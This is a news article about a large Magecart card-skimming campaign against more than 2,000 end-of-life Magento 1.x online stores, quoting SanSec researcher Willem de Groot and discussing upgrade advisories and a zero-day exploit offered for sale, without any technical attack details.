More than 2,000 Magento online stores were hacked over the weekend in what security researchers described as the “biggest campaign ever.”
The attacks were a typical Magecart scheme in which hackers hacked into sites and then implanted malicious scripts in the source code of stores, code that recorded payment card details that shoppers entered into forms in the store. payment.
“On Friday 10 stores were infected, then 1,058 on Saturday, 603 on Sunday and 233 today,” said Willem de Groot, founder of Sanguine Security (SanSec), a Dutch cybersecurity company specializing in monitoring Magecart attacks.
“This automated campaign is by far the largest Sansec has identified since it began monitoring in 2015,” added de Groot. “The previous record was 962 stores hacked in one day in July of last year. ”
Most stores were running an EOL version
The SanSec executive said that most of the compromised sites are running version 1.x of the Magento online store software.
This version of Magento reached its End of Life (EOL) on June 30, 2020 and is currently no longer receiving security updates.
Ironically, attacks on sites running the now obsolete Magento 1.x software had been planned since last year, when Adobe, owner of Magento, issued the first alert in November 2019 regarding store owners needing to upgrade. branch 2.x.
Adobe’s initial warning of impending attacks on Magento 1.x stores was later echoed in similar security advisories issued by Mastercard and Visa in the spring.
In our coverage of the Mastercard and Visa alerts, several experts in the web security community told this reporter that the new vulnerabilities in Magento 1.x had not been detected for some time, which was unusual as the branch 1.x was old and was riddled with security holes.
At the time, these security experts believed that hackers were intentionally sitting on their Magento 1.x exploits and waiting for the EOL to arrive, to make sure Adobe didn’t fix their bugs.
It seems these experts were right.
While de Groot has yet to identify how hackers broke into targeted sites over the weekend, the founder of SanSec said announcements for a Magento 1.x zero-day vulnerability have been released. on underground hacking forums last month, confirming that hackers had been waiting for the EOL to arrive.
In the ad, a user with the name of z3r0day offered to sell a remote code execution (RCE) exploit for $ 5,000, an offer deemed credible at the time.
The good news is that since November 2019, when Adobe started urging Magento owners to migrate to the new branch, the number of Magento 1.x stores has grown from 240,000 to 110,000 in June 2020 and to 95,000. today.
The pace is slow, but it is believed that many stores that have not been updated are most likely abandoned and have very low user traffic. However, some high traffic sites still run the 1.x branch and rely on web application firewalls (WAFs) to stop attacks.
It’s a risky strategy which, while it may be PCI compliant, may not be a smart decision in the long run.
In related news, Adobe also announced last week that it has partnered with SanSec to integrate the security company’s database of over 9,000 Magento malware signatures into the Magento backend, as part of the Security analysis tool.